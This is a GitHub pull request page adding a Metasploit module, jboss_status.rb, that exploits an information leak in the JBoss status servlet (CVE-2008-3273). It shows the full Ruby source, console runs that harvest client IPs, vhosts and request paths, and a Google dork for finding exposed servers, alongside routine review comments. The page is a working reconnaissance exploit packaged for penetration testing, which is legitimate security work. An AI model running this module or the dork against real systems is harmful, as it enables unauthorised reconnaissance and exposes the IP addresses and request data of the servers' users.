Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP

Loading…

Module to query Jboss status servlet to collect sensitive information #2996

Merged
merged 4 commits into from

4 participants

@mcantoni

Name:
Jboss Status Servlet Info Gathering

Description:
This module queries the Jboss status servlet to collect sensitive
information: URL paths, GET parameters and the clients IP address.
This module has been tested against Jboss 4.0., 4.2.2, 4.2.3.

Note:
Useful during a penetration test. Code and description are free to be modified.

msftidy.rb: OK
Dork google: intitle:"Tomcat Status" "Total memory" (5.630 results)

Install Jboss:

wget http://sourceforge.net/projects/jboss/files/JBoss/JBoss-4.2.3.GA/jboss-4.2.3.GA.zip/download
unzip jboss-4.2.3.GA.zip
./run.sh -Djboss.bind.address= -Djboss.bind.address.management=

Demo (this it's only a fake example):

msf auxiliary(jboss_status) > show options

Module options (auxiliary/gather/jboss_status):

Name Current Setting Required Description


DELAY 5 no Delay in seconds between requests
PATH /status yes The Jboss status servlet URI path
Proxies no Use a proxy chain
REQCOUNT 3 no Number of HTTP requests
RHOSTS 1.2.3.4 yes The target address range or CIDR identifier
RPORT 8080 yes The target port
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

msf auxiliary(jboss_status) > set RHOSTS 1.2.3.4
RHOSTS => 1.2.3.4
msf auxiliary(jboss_status) > set REQCOUNT 3
REQCOUNT => 3
msf auxiliary(jboss_status) > set DELAY 5
DELAY => 5
msf auxiliary(jboss_status) > run

[] 1.2.3.4:8080 1/3 requests...
[
] 1.2.3.4:8080 sleeping for 5 seconds...
[] 1.2.3.4:8080 2/3 requests...
[
] 1.2.3.4:8080 sleeping for 5 seconds...
[] 1.2.3.4:8080 3/3 requests...
[
] 1.2.3.4:8080 sleeping for 5 seconds...
[+] 1.2.3.4:8080 JBoss application server!

[+] CLIENTS IP ADDRESSES:
[+] 4.3.2.1

[+] SERVER (VHOST) IP ADDRESSES:
[+] 1.2.3.4

[+] PATH REQUESTS:
[+] GET /status HTTP/1.1
[] Scanned 1 of 1 hosts (100% complete)
[
] Auxiliary module execution completed

@zeroSteiner
Collaborator

This PR includes two modules, modules/auxiliary/gather/jboss_status.rb and modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb Not sure if you meant to submit both as the description only mentions the JBoss module. If you meant to submit both, it would speed things along if they were broken into two separate pull requests so they can be tested individually.

@mcantoni

Sorry, this PR is only for modules/auxiliary/gather/jboss_status.rb.
Now I have to figure out how to remove the module snmp_enum_hp_laserjet.rb :(
The latter already has a PR: #2919

@jvazquez-r7
Collaborator

@mcantoni you can use:

git rm modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb

Then proceed with git commit and git push origin as usual to push the changes, so the pull request will be updated :) Hope it helps!

@jvazquez-r7
Collaborator

Processing....

@jvazquez-r7 jvazquez-r7 self-assigned this
@jvazquez-r7 jvazquez-r7 merged commit fbcd661 into rapid7:master

1 check passed

Details default The Travis CI build passed
@jvazquez-r7
Collaborator

Hi @mcantoni,

Landed it after several modifications, check final result here: 9374777

( deleted the RETRY thing because doesn't look super useful, if you need to keep the module pinging a machine or a set of machines, worths to add automation maybe through a rc file).

After changes, working successfully:

msf > use auxiliary/scanner/http/jboss_status 
msf auxiliary(jboss_status) > set rhosts 192.168.172.134
rhosts => 192.168.172.134
msf auxiliary(jboss_status) > run

[+] 192.168.172.134:8080 JBoss application server found

JBoss application server requests
=================================

 Client         Vhost target     Request
 ------         ------------     -------
 192.168.172.1  192.168.172.134  GET /status HTTP/1.1

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(jboss_status) > notes
[*] Time: 2014-03-28 20:59:37 UTC Note: host=192.168.172.134 service=http type=JBoss application server info data="192.168.172.134:8080 GET /status HTTP/1.1"
msf auxiliary(jboss_status) > services

Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.172.134  8080  tcp    http  open   Apache-Coyote/1.1 ( Powered by Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0 )

Thanks @mcantoni !

@wvu-r7
Collaborator

@mcantoni: You left f18fef1 and 7c860b9, so GitHub thinks #2919 has been merged.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Jan 25, 2014
  1. @mcantoni
Commits on Feb 13, 2014
  1. @mcantoni

    fix description

    mcantoni authored
Commits on Feb 15, 2014
  1. @mcantoni
Commits on Mar 21, 2014
  1. @mcantoni
This page is out of date. Refresh to see the latest.
Showing with 147 additions and 0 deletions.
  1. +147 −0 modules/auxiliary/gather/jboss_status.rb
View
147 modules/auxiliary/gather/jboss_status.rb
@@ -0,0 +1,147 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Jboss Status Servlet Info Gathering',
+ 'Description' => %q{
+ This module queries the Jboss status servlet to collect sensitive
+ information: URL paths, GET parameters and the clients IP address.
+
+ Note: this module has been tested against Jboss 4.0., 4.2.2, 4.2.3
+ },
+ 'References' =>
+ [
+ ['CVE', '2008-3273'],
+ ['URL', 'http://seclists.org/fulldisclosure/2011/Sep/139'],
+ ['URL', 'https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf'],
+ ['URL', 'http://www.slideshare.net/chrisgates/lares-fromlowtopwned'],
+ ],
+ 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
+ 'License' => MSF_LICENSE
+ )
+
+ register_options([
+ Opt::RPORT(8080),
+ OptString.new('PATH', [ true, "The Jboss status servlet URI path", '/status']),
+ OptInt.new('REQCOUNT', [false, 'Number of HTTP requests', 3]),
+ OptInt.new('DELAY', [false, "Delay in seconds between requests",5])
+ ], self.class)
+ end
+
+ def run_host(target_host)
+
+ jpath = normalize_uri(datastore['PATH'])
+
+ req_src = []
+ req_dst = []
+ req_path = []
+
+ # loop to detect more informations
+ datastore['REQCOUNT'].times do |count|
+ vprint_status("#{rhost}:#{rport} #{count + 1}/#{datastore['REQCOUNT']} requests...")
+
+ begin
+ res = send_request_raw({
+ 'uri' => jpath,
+ 'method' => 'GET'
+ }, 10)
+
+ # detect JBoss application server
+ if res and res.code == 200 and res.body.match(/<title>Tomcat Status<\/title>/)
+ http_fingerprint({ :response => res })
+
+ html_rows = res.body.split(/<strong>/)
+ html_rows.each do |row|
+
+ #Stage Time B Sent B Recv Client VHost Request
+ #K 150463510 ms ? ? 1.2.3.4 ? ?
+
+ # filter client requests
+ if row.match(/(.*)<\/strong><\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td>(.*)<\/td><td nowrap>(.*)<\/td><td nowrap>(.*)<\/td><\/tr>/)
+
+ j_src = $5
+ j_dst = $6
+ j_path = $7
+
+ req_src << j_src
+ if !j_dst.match(/\?/)
+ req_dst << j_dst
+ end
+ if !j_path.match(/\?/)
+ req_path << j_path
+ end
+ end
+ end
+ elsif res.code == 401
+ vprint_error("#{rhost}:#{rport} authentication is required!")
+ return
+ elsif res.code == 403
+ vprint_error("#{rhost}:#{rport} forbidden!")
+ return
+ else
+ vprint_error("#{rhost}:#{rport} may not support JBoss application server!")
+ return
+ end
+ end
+
+ if datastore['DELAY'] > 0 and datastore['REQCOUNT'] > 1
+ vprint_status("#{rhost}:#{rport} sleeping for #{datastore['DELAY']} seconds...")
+ select(nil,nil,nil,datastore['DELAY'])
+ end
+ end
+
+ # show results
+ if !req_src.empty?
+
+ print_good("#{rhost}:#{rport} JBoss application server!")
+ report_note({
+ :host => target_host,
+ :proto => 'tcp',
+ :sname => (ssl ? 'https' : 'http'),
+ :port => rport,
+ :type => 'JBoss application server',
+ :data => "#{rhost}:#{rport}"
+ })
+
+ print_line
+ print_good("CLIENTS IP ADDRESSES:")
+ req_src.sort.uniq.each do |e|
+ print_good("#{e}")
+ end
+
+ print_line
+ print_good("SERVER (VHOST) IP ADDRESSES:")
+ req_dst.sort.uniq.each do |e|
+ print_good("#{e}")
+ end
+
+ print_line
+ print_good("PATH REQUESTS:")
+ req_path.sort.uniq.each do |e|
+ print_good("#{e}")
+
+ report_note({
+ :host => target_host,
+ :proto => 'tcp',
+ :sname => (ssl ? 'https' : 'http'),
+ :port => rport,
+ :type => 'JBoss application server info',
+ :data => "#{rhost}:#{rport} #{e}"
+ })
+ end
+
+ end
+ end
+end
Something went wrong with that request. Please try again.